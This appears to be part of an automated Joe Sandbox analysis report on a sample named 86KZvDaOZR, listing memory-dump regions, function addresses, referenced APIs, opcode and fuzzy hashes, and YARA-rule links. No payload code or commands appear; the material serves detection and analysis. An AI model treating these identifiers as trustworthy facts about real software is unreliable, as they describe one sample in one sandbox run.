Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 9fbb62692fdbe0ce074168db7fc2044f3779da37f6a9d675f5fe8e51c14acf3d
Instruction ID: 5d0516373c64633d5ab1eea220c46f66c3b0b545549c961710e143ae279989fb
Opcode Fuzzy Hash: 9fbb62692fdbe0ce074168db7fc2044f3779da37f6a9d675f5fe8e51c14acf3d
Instruction Fuzzy Hash: 49019671905755EBD711CFA4D900B5AB7F8FB05B24F21431AEC5597B80D7B599008AD0

Function 6CF69D21 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6CF6E8DC

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: H_prolog3_catch_malloc
String ID:
API String ID: 529455676-0
Opcode ID: 5d84cb3bb1ac5f051cb44f1c4a8405c17b8e40396ad798c1e7fed81de8b3705f
Instruction ID: 5cd956b3c526650c6990faa9fd26e87ffc3edb1dbb5d291e6b33a877323e0470
Opcode Fuzzy Hash: 5d84cb3bb1ac5f051cb44f1c4a8405c17b8e40396ad798c1e7fed81de8b3705f
Instruction Fuzzy Hash: F8D05E32514208D7CF41ABAAD505BAD7BA0AB41325F504065E008BAF80DE718A0887AA

Function 6CF6A510 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

___security_init_cookie.LIBCMT ref: 6CF6A510

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ___security_init_cookie
String ID:
API String ID: 3657697845-0
Opcode ID: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
Instruction ID: f84a349a433411e5db9fd1bf440b85eabcaa3c1dc735977f855d4e13c4c417f4
Opcode Fuzzy Hash: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
Instruction Fuzzy Hash: A2C09B351043089F8B04CF11F841DDE3755AF54224710D115FC1C06F519B319575D554

Function 00FF8540 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

8gq, xrefs: 00FF85CF

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID: 8gq
API String ID: 0-1984363304
Opcode ID: 224a3c482cd4d712292697f16b1bbd71dad49d7a4d2e1687764e36a77b0df791
Instruction ID: 637d13fc1c57c6ceb6ac58cc15db27dc82fe6b0b96aa8fe613f335a7f82e22d2
Opcode Fuzzy Hash: 224a3c482cd4d712292697f16b1bbd71dad49d7a4d2e1687764e36a77b0df791
Instruction Fuzzy Hash: 334110B4D0420CDFCB04DFA9D8846EDBBB5FF89360F18902AE509A7260EB745902EF54

Function 00FF9D98 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

Hgq, xrefs: 00FF9E2C

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID: Hgq
API String ID: 0-2103768809
Opcode ID: a63f2cce0e25bb29849945aef0fb85a540e4bfe7e47a1bec970b7d9a5cdefcf6
Instruction ID: 95cf505d269d05e646a8e6a1d2387ed6b4cb337db6fda64427da714b9d48c20f
Opcode Fuzzy Hash: a63f2cce0e25bb29849945aef0fb85a540e4bfe7e47a1bec970b7d9a5cdefcf6
Instruction Fuzzy Hash: BF21A531B04108AFDB44AB788C05BBE7BB6EF85300F10C466E649DB290DB759E56DBA0

Function 00FF0989 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2ee7931fa99d287e6518220b823d9cb11a3aaaba8b3469adfce996549709bf7
Instruction ID: 1969620cc2df52eb80ce8403b248d29d4feae25a87b560eff7c5178594f359ac
Opcode Fuzzy Hash: d2ee7931fa99d287e6518220b823d9cb11a3aaaba8b3469adfce996549709bf7
Instruction Fuzzy Hash: D2419275E002099FDB04DFA8D984AEEBBB6FF88310F248515E909A7365DB34A946CB50

Function 00FF87F8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ca76cca26aa71a811c1ff756a0dce8cd5f139d27914a40d1c5c4796677e3fae
Instruction ID: 331a8d2b5b540c7fc2d39c97968f858d99ff9459d45cef1cc83d2db3e1379b49
Opcode Fuzzy Hash: 5ca76cca26aa71a811c1ff756a0dce8cd5f139d27914a40d1c5c4796677e3fae
Instruction Fuzzy Hash: E0215C31E0021CDFDB04EBA8D854AFEBBB2EF88390F548129D506A7290DF305D42DBA5

Function 00FF0838 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 028307d77233703a72749bcc24f1bdecf478cc361939e6a690195d580d3a00d2
Instruction ID: 02cfcbbff43631cf81cd356dccec25b4976e1958de4f3986e250ef2e009ef996
Opcode Fuzzy Hash: 028307d77233703a72749bcc24f1bdecf478cc361939e6a690195d580d3a00d2
Instruction Fuzzy Hash: 62210475D09209CFCB04CFA5C8486FEBBB5FF89310F248469D505A72A2EB354A46EB91

Function 00FF0910 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67e351a58582ce99e788e80bccbba8a944298f49276783c90fe35ad74e48c459
Instruction ID: 5ac4ed72c39adb2bbe2adb0e62ae903bf35a97b906d2ea09a4f3ecf54cfc9a65
Opcode Fuzzy Hash: 67e351a58582ce99e788e80bccbba8a944298f49276783c90fe35ad74e48c459
Instruction Fuzzy Hash: 8B215974E0421D8BCF00CFA8C944AEDB7F5EF89310F148526E909B7362EB749905DB60

Function 05862516 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2025449746.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53cc53cea9f53bca5ae4a9b43741dfbb67d01a2dc3e6b6a5eab04492fb19a008
Instruction ID: d73a00d890d69366adc2c7bf6144cfdaadd59c0540d918d2aa89ca08bbd7340f
Opcode Fuzzy Hash: 53cc53cea9f53bca5ae4a9b43741dfbb67d01a2dc3e6b6a5eab04492fb19a008
Instruction Fuzzy Hash: C8216D75A102058BCB14DF68D994A6EBBF3BF88310F15C559D816CB394DB30EC428B81

Function 00A8D964 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017481935.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a8d000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 686c9a7528388e0a0b28f5ad844370d78be1c24cb397184e29f22ff664a263cd
Instruction ID: ca8cf0b7281e2364a9e8bcec7df299d04c32593bd7b541d3ec6fa0f5a98d7742
Opcode Fuzzy Hash: 686c9a7528388e0a0b28f5ad844370d78be1c24cb397184e29f22ff664a263cd
Instruction Fuzzy Hash: 072104B1504240EFDF09EF14D9C0B2ABBA5FB84314F34C56DE8090B686C33AD816CBA2

Function 00A8DA4C Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017481935.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a8d000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e748f90a8aa86366d1ee07c62f16fad7c68c85fbbf22bc49801da4bdf1262684
Instruction ID: b8053f460861154202d73f69aa1bd94333dea8936b0e8cec406a96aa605e735c
Opcode Fuzzy Hash: e748f90a8aa86366d1ee07c62f16fad7c68c85fbbf22bc49801da4bdf1262684
Instruction Fuzzy Hash: 7421F6B1508345EFDB05EF14D9C4B26FBA5FB94324F34C569E9094B285C336D816C7A1

Function 00FF8450 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41a230c8acc3435f07cd902090f7ff7a453c9d37d040ba8ccca9db1cab9a3f5d
Instruction ID: 0848a8f1c42adf68402a2463e6f161d20bc9299abb37360dff6a6f55ac6f31fd
Opcode Fuzzy Hash: 41a230c8acc3435f07cd902090f7ff7a453c9d37d040ba8ccca9db1cab9a3f5d
Instruction Fuzzy Hash: A721C475D0420ACFCB04DFA9D9446EEBBF5AF8D320F248465D515A7360DB305946EFA0

Function 00A8D524 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017481935.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a8d000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00012cc44c2bb7f989daa26ff91b48b09beae94625c00a5203423b867456aa4a
Instruction ID: 5158355d5b97055624d0bf52c63f0a958712bd59edbfaeaf4b1083c9710d10cf
Opcode Fuzzy Hash: 00012cc44c2bb7f989daa26ff91b48b09beae94625c00a5203423b867456aa4a
Instruction Fuzzy Hash: 4A21C6B1544240DFDB18FF14D9C4B2ABF65FB94328F34C56AD84A4B285C335D846C7A1

Function 00A8D44C Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017481935.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a8d000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1369274334553c7c92c327cfa0ca0ea2f199186701315f0ee9d0aad870063184
Instruction ID: bda9bd7cd52124d1eb92758ab05289dfa25ba9267109a7de283279b822ab0a14
Opcode Fuzzy Hash: 1369274334553c7c92c327cfa0ca0ea2f199186701315f0ee9d0aad870063184
Instruction Fuzzy Hash: 8221F3B1504244EFDB14EF14D5C4B2ABBA5FB84328F34C56DD84A4B286C33AE846C761

Function 00FF9CC0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 935d3b99d40929b182490f04996319fdf68fe44659733a9b438e466fd49927eb
Instruction ID: 6dcf759b988d63ae11a8d4511737cabae5a75b08b0717c256320e8be5d8edb2e
Opcode Fuzzy Hash: 935d3b99d40929b182490f04996319fdf68fe44659733a9b438e466fd49927eb
Instruction Fuzzy Hash: 2E21C275E0821DDFCB04CF99D840AEEBBB5BF49310F208029EA15A7360D7759941EFA0

Function 00FF0848 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6956def1e9394345183f5dd1f196c56a30c9ad83ddffe91113cabf2d9dd83ddc
Instruction ID: c4930881a89a9308af25f1d227f9e9819f2a6ce9428b94a8fccd21c1084a7d44
Opcode Fuzzy Hash: 6956def1e9394345183f5dd1f196c56a30c9ad83ddffe91113cabf2d9dd83ddc
Instruction Fuzzy Hash: 21211275D09209CFCB04CFA5C8486FEBBF9FF89300F249429D505B2261EB349A45EB90

Function 05860849 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2025449746.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f1bb38fc768e5747caa757b959b57d11e4153f565589b7792cc93e74e5d6d18
Instruction ID: 6f50d15f2f6e0984ae9d54f1675ed87bd3c1ad120d89ef96dcaa84c4bd4c49fa
Opcode Fuzzy Hash: 1f1bb38fc768e5747caa757b959b57d11e4153f565589b7792cc93e74e5d6d18
Instruction Fuzzy Hash: F2118F313082505FC706DB78D8A496EBFF5EF8A61031684EEE54ACB3B3CA219C09C750

Function 00A8D95F Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017481935.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a8d000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4debc72d566a432075444213d0986bb668aee8537d1fa8b58e63e6cf4e4d047
Instruction ID: 7ddba2c23bf0c42ff809a0b3d2970a6c90b3c5847479cefb15d3e4d72f82ff4f
Opcode Fuzzy Hash: d4debc72d566a432075444213d0986bb668aee8537d1fa8b58e63e6cf4e4d047
Instruction Fuzzy Hash: 74119376504280CFDB15DF14D5C4B16FF72FB84314F24C5A9D8494B696C33AD81ACBA2

Function 00A8DA47 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017481935.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a8d000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eedea354e1f580473d21225093553874deeaf8afd5903a59a74e5cb2e8010670
Instruction ID: 7f2c0fe50398a947da05c4f6604f5b63595a7532d6cdcb4b693e6179b21efe04
Opcode Fuzzy Hash: eedea354e1f580473d21225093553874deeaf8afd5903a59a74e5cb2e8010670
Instruction Fuzzy Hash: 5411B276504280CFDB15DF14D5C4B16FF71FB94324F24C6A9D8494B696C33AD81ACBA1

Function 00A8D447 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017481935.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a8d000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ccc830e23e2a284c931ee2cb5cea2ec1ce756450de644149ff13e3e87f156b1
Instruction ID: 183ec812eced5310de24a0896383992a81d6627018f8d67bf2c33db8d6ac03b1
Opcode Fuzzy Hash: 5ccc830e23e2a284c931ee2cb5cea2ec1ce756450de644149ff13e3e87f156b1
Instruction Fuzzy Hash: 9B110175504280CFDB11DF10D5C4B19BF61FB84324F24C2AAD8494B696C33AE84ACB92

Function 00A8D51F Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017481935.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a8d000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ccc830e23e2a284c931ee2cb5cea2ec1ce756450de644149ff13e3e87f156b1
Instruction ID: 23b1cb93f28628971ead170ec331ba17606e6e808f4081c929e2e2240ac5dcb2
Opcode Fuzzy Hash: 5ccc830e23e2a284c931ee2cb5cea2ec1ce756450de644149ff13e3e87f156b1
Instruction Fuzzy Hash: D511E375504280CFDB15EF14D5C4B1AFF71FB84328F24C2AAD8494B696C33AD84ACBA2

Function 05860868 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2025449746.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95611d3e924e722fcd1e6449d12d1ba56444af47fcd8db73da8bb10ba93a7fdf
Instruction ID: f87f6ac58f46e703e03a3ecd51048530f351c3778738a44078e64114f1eeed2c
Opcode Fuzzy Hash: 95611d3e924e722fcd1e6449d12d1ba56444af47fcd8db73da8bb10ba93a7fdf
Instruction Fuzzy Hash: 3E0112753001109FC744EB6DD898C6EB7E9EF8961035144ADF50ACB371DF61DD058750

Function 00A7D149 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017435030.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a7d000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c252d9e7cd753e492ca840818c158cd5955851d84035d46652e5219e943f6a45
Instruction ID: 3fc76857902422945aabbad6fd2e8a4f3893f8d381c8fc2c4640acf98064469c
Opcode Fuzzy Hash: c252d9e7cd753e492ca840818c158cd5955851d84035d46652e5219e943f6a45
Instruction Fuzzy Hash: 3201D6711043449AE7209B19DDC4767FFB8DF91370F68CA1AED0D4A286C3799845CAB1

Function 00A7D148 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017435030.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a7d000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42953f37eaa18fe79c9610583fb5b0d636ebb9c609af5501b8d4890beb925a4d
Instruction ID: 9e2fe51441b5c7f3220e90e1ccdf59998d84d85a411d9b25d8c64732df4ee54b
Opcode Fuzzy Hash: 42953f37eaa18fe79c9610583fb5b0d636ebb9c609af5501b8d4890beb925a4d
Instruction Fuzzy Hash: 21F0CD71404344AEE7208B0ADD88B63FFA8EF90334F18C55AED0C4E286C3799844CAB0

Function 00FFF3E0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53bebcd227b66675057537d1151271a030f8d5a30f105e0a6c7cb3288b26a70
Instruction ID: f5fde8c23c85872b2627e0b6973d4d47064d1731b73cc612e91ea728f778bc9e
Opcode Fuzzy Hash: f53bebcd227b66675057537d1151271a030f8d5a30f105e0a6c7cb3288b26a70
Instruction Fuzzy Hash: 82E06536704268BB8F065F55D8148BF3F6AEFC83717048026FD55C2250CA35C921ABA0

Function 00FF0B18 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53e11b42943d637ba2638aa42c31f29ad171100795ea99b69b0838fb99598f8f
Instruction ID: acb55bb0c4e8e15338ebbb3df0d3293a05e452072770026c74bc08e19b4f0f1e
Opcode Fuzzy Hash: 53e11b42943d637ba2638aa42c31f29ad171100795ea99b69b0838fb99598f8f
Instruction Fuzzy Hash: 32F03074C49289DFCB41DFB898846ECBFB0DF4A210F1441EEC944D7262D7740A46DB52

Function 00FF97C0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8875d16af088540aa79193b892c13e84d62d1b4b12bdd73de76625103b9b3599
Instruction ID: cb15f7e961ae0b5e8b92c07a4807628521af3d24d6197b4fdb7f8c9cce8c2eb1
Opcode Fuzzy Hash: 8875d16af088540aa79193b892c13e84d62d1b4b12bdd73de76625103b9b3599
Instruction Fuzzy Hash: FCE0ED75D1920CEFCB54EFA8D8056EDBBB5AF48310F10C1A6A95492360E7745A50EF81

Function 00FF0B28 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b12cb428ec138c016668c35dfe9a81abd2dc8bc746268cb1629429e5a0e3e2c1
Instruction ID: 9bc186a18d4433ada3019d9c4b60692542b5f5661743fce4d96334cf235e0db1
Opcode Fuzzy Hash: b12cb428ec138c016668c35dfe9a81abd2dc8bc746268cb1629429e5a0e3e2c1
Instruction Fuzzy Hash: 26E0EC74D4520CDFCB50EFA8D9496ADBBB8AB49315F1041A99A08D3261EB305A50DB91

Function 00FF7A68 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb97caf1a3f9f19f1d24621f9c73a9e084d6eb7dfa1c71e1a1067d853da9eaec
Instruction ID: 494404640581ab3d723de687a0f5f9d1c0eaaccb984c4436f2837bf7c324ba97
Opcode Fuzzy Hash: cb97caf1a3f9f19f1d24621f9c73a9e084d6eb7dfa1c71e1a1067d853da9eaec
Instruction Fuzzy Hash: 41D0233144E20DD7C700EB94D404BBDF36CDB01310F000158950913170D7301F10E785

Function 00FFA4E0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b281daa0e3b01fa4effea28a32cda1df5e691279af6539367e119991a8c702
Instruction ID: cab1a0be07911618038c19956cd5afbf12637652457d0c3ab9b756b1382642a6
Opcode Fuzzy Hash: 28b281daa0e3b01fa4effea28a32cda1df5e691279af6539367e119991a8c702
Instruction Fuzzy Hash: C1D0C970A042099FDB105B71D90CB267A989B10361F08C426E90AC2260EA71C8649665

Non-executed Functions

Function 6CF22D70 Relevance: 35.2, APIs: 23, Instructions: 669COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF22DFF
VariantInit.OLEAUT32(?), ref: 6CF22E08
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF22E7E
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF22EB5
VariantClear.OLEAUT32(?), ref: 6CF22EC1

Part of subcall function 6CF2C850: VariantInit.OLEAUT32(?), ref: 6CF2C88F
Part of subcall function 6CF2C850: VariantInit.OLEAUT32(?), ref: 6CF2C895
Part of subcall function 6CF2C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF2C8A0
Part of subcall function 6CF2C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF2C8D5
Part of subcall function 6CF2C850: VariantClear.OLEAUT32(?), ref: 6CF2C8E1

VariantClear.OLEAUT32(?), ref: 6CF230D5
SafeArrayDestroy.OLEAUT32(?), ref: 6CF23550
VariantClear.OLEAUT32(?), ref: 6CF23563
VariantClear.OLEAUT32(?), ref: 6CF23569

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
